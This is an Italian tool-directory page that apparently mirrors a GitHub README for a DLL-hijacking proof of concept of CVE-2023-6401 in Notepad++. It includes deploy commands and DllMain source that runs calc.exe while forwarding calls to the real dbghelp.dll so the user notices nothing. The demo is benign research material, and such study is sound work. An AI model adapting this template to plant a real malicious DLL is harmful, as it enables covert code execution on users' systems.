Skip to content
KitploitKITPLOIT
StrumentiExploitsBlog
Log in
Invia
StrumentiExploitsBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2023-6401 — CVE-2023-6401 è una vulnerabilità di DLL hijacking che consente agli attaccanti di eseguire codice arbitrario inserendo un file `dbghelp.dll` dannoso nella directory dell'applicazione. Questo progetto dimostra la vulnerabilità e fornisce un PoC riproducibile. | Kitploit
Strumenti/GitHubGitHub/mekitoci/cve-2023-6401
Analisi delle VulnerabilitàExploitApprendimento e FormazioneSviluppo PayloadBinary Exploitation
GitHubmekitoci/cve-2023-6401

CVE-2023-6401

CVE-2023-6401 è una vulnerabilità di DLL hijacking che consente agli attaccanti di eseguire codice arbitrario inserendo un file `dbghelp.dll` dannoso nella directory dell'applicazione. Questo progetto dimostra la vulnerabilità e fornisce un PoC riproducibile.

Vedi Repository
211 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2023-6401 · Prova di concetto di DLL Hijacking

License Platform

English | 中文


中文

⚠️ Avviso importante: solo per scopi di ricerca sulla sicurezza e formazione

Prova di concetto per la vulnerabilità di DLL hijacking in NotePad++ ≤ 8.1. Consente di eseguire codice arbitrario inserendo una dbghelp.dll dannosa nella directory dell'applicazione.

Avvio rapido

# 下載專案
git clone https://github.com/mekitoci/CVE-2023-6401.git

# 進入專案目錄
cd CVE-2023-6401-main

# 編譯DLL
# gcc -shared -o dbghelp.dll dbghelp.c -Wall -Wl,--subsystem,windows

# 部署到NotePad++目錄
copy dbghelp.dll "C:\Program Files\Notepad++\"

# 執行測試
"C:\Program Files\Notepad++\notepad++.exe"

# 立即清理
del "C:\Program Files\Notepad++\dbghelp.dll"

Risultato atteso: si apre la calcolatrice + viene mostrata una finestra di messaggio + NotePad++ si avvia normalmente

Risultato PoC

Dettagli della vulnerabilità

ElementoDettagli
ID CVECVE-2023-6401
Versioni interessateNotePad++ ≤ 8.1
Tipo di vulnerabilitàDLL hijacking / dirottamento dell'ordine di ricerca
ImpattoEsecuzione di codice arbitrario
PrerequisitiPermesso di scrittura nella directory dell'applicazione

Principio

Windows carica le DLL nel seguente ordine:

  1. Directory dell'applicazione (priorità massima)
  2. Directory di System32
  3. Directory di Windows
  4. Directory corrente
  5. Variabile d'ambiente PATH

NotePad++ carica dbghelp.dll all'avvio. Inserendo una DLL dannosa con lo stesso nome nella directory dell'applicazione, è possibile eseguire codice prima del caricamento della DLL di sistema.

Implementazione tecnica

Codice principale

BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved)
{
    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:
        // 執行惡意程式碼
        WinExec("calc.exe", SW_SHOW);
        MessageBoxA(NULL, "CVE-2023-6401 Crack", "Alert", MB_OK);

        // 載入真實DLL並轉發API調用
        char systemPath[MAX_PATH];
        GetSystemDirectoryA(systemPath, MAX_PATH);
        strcat(systemPath, "\\dbghelp.dll");
        realDbghelp = LoadLibraryA(systemPath);
        
        if (realDbghelp)
            realImageNtHeader = (pImageNtHeader)GetProcAddress(realDbghelp, "ImageNtHeader");
        break;
    }
    return TRUE;
}

Caratteristiche principali

  • Dirottamento dell'ordine di ricerca: sfrutta il meccanismo di ricerca delle DLL di Windows
  • Inoltro API: carica la DLL reale e inoltra le chiamate di funzione per mantenere il normale funzionamento dell'applicazione
  • Furtività: l'utente non nota alcuna anomalia

Opzioni di compilazione

MinGW (consigliato)

gcc -shared -o dbghelp.dll dbghelp.c -Wall -Wl,--subsystem,windows

Pulizia

# 移除惡意DLL
del "C:\Program Files\Notepad++\dbghelp.dll"

# 確認移除
dir "C:\Program Files\Notepad++\dbghelp.dll" 2>nul || echo "清理完成"

Riferimenti

  • CVE-2023-6401
  • Ordine di ricerca delle DLL di Microsoft
  • MITRE ATT&CK T1574.001

Dichiarazione di non responsabilità

Questo progetto è destinato esclusivamente a scopi educativi e di ricerca sulla sicurezza. Gli utenti sono gli unici responsabili del rispetto delle leggi e dei regolamenti applicabili.


English

⚠️ Avviso importante: solo per scopi di ricerca sulla sicurezza e formazione

Prova di concetto per la vulnerabilità di DLL hijacking in NotePad++ ≤ 8.1. Consente di eseguire codice arbitrario inserendo una dbghelp.dll dannosa nella directory dell'applicazione.

Avvio rapido

# Clone the project
git clone https://github.com/mekitoci/CVE-2023-6401.git

# Navigate to project directory
cd CVE-2023-6401-main

# gcc -shared -o dbghelp.dll dbghelp.c -Wall -Wl,--subsystem,windows

# Deploy to NotePad++ directory
copy dbghelp.dll "C:\Program Files\Notepad++\"

# Execute test
"C:\Program Files\Notepad++\notepad++.exe"

# Immediate cleanup
del "C:\Program Files\Notepad++\dbghelp.dll"

Risultato atteso: si apre la calcolatrice + viene mostrata una finestra di messaggio + NotePad++ si avvia normalmente

Risultato PoC

Dettagli della vulnerabilità

ElementoDettagli
ID CVECVE-2023-6401
Versioni interessateNotePad++ ≤ 8.1
Tipo di vulnerabilitàDLL hijacking / dirottamento dell'ordine di ricerca
ImpattoEsecuzione di codice arbitrario
PrerequisitiPermesso di scrittura nella directory dell'applicazione

Meccanismo

Windows carica le DLL nel seguente ordine:

  1. Directory dell'applicazione (priorità massima)
  2. Directory di System32
  3. Directory di Windows
  4. Directory corrente
  5. Variabile d'ambiente PATH

NotePad++ carica dbghelp.dll all'avvio. Inserendo una DLL dannosa con lo stesso nome nella directory dell'applicazione, è possibile eseguire codice prima del caricamento della DLL di sistema.

Implementazione tecnica

Codice principale

BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved)
{
    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:
        // Execute malicious code
        WinExec("calc.exe", SW_SHOW);
        MessageBoxA(NULL, "CVE-2023-6401 Crack", "Alert", MB_OK);

        // Load real DLL and forward API calls
        char systemPath[MAX_PATH];
        GetSystemDirectoryA(systemPath, MAX_PATH);
        strcat(systemPath, "\\dbghelp.dll");
        realDbghelp = LoadLibraryA(systemPath);
        
        if (realDbghelp)
            realImageNtHeader = (pImageNtHeader)GetProcAddress(realDbghelp, "ImageNtHeader");
        break;
    }
    return TRUE;
}

Caratteristiche principali

  • Dirottamento dell'ordine di ricerca: sfrutta il meccanismo di ricerca delle DLL di Windows
  • Inoltro API: carica la DLL reale e inoltra le chiamate di funzione per mantenere il normale funzionamento dell'applicazione
  • Furtività: gli utenti non notano alcuna anomalia

Opzioni di compilazione

MinGW (consigliato)

gcc -shared -o dbghelp.dll dbghelp.c -Wall -Wl,--subsystem,windows

Pulizia

# Remove malicious DLL
del "C:\Program Files\Notepad++\dbghelp.dll"

# Confirm removal
dir "C:\Program Files\Notepad++\dbghelp.dll" 2>nul || echo "Cleanup completed"

Riferimenti

  • CVE-2023-6401
  • Ordine di ricerca delle DLL di Microsoft
  • MITRE ATT&CK T1574.001

Dichiarazione di non responsabilità

Questo progetto è destinato esclusivamente a scopi educativi e di ricerca sulla sicurezza. Gli utenti sono gli unici responsabili del rispetto delle leggi e dei regolamenti applicabili.

Scarica lo strumento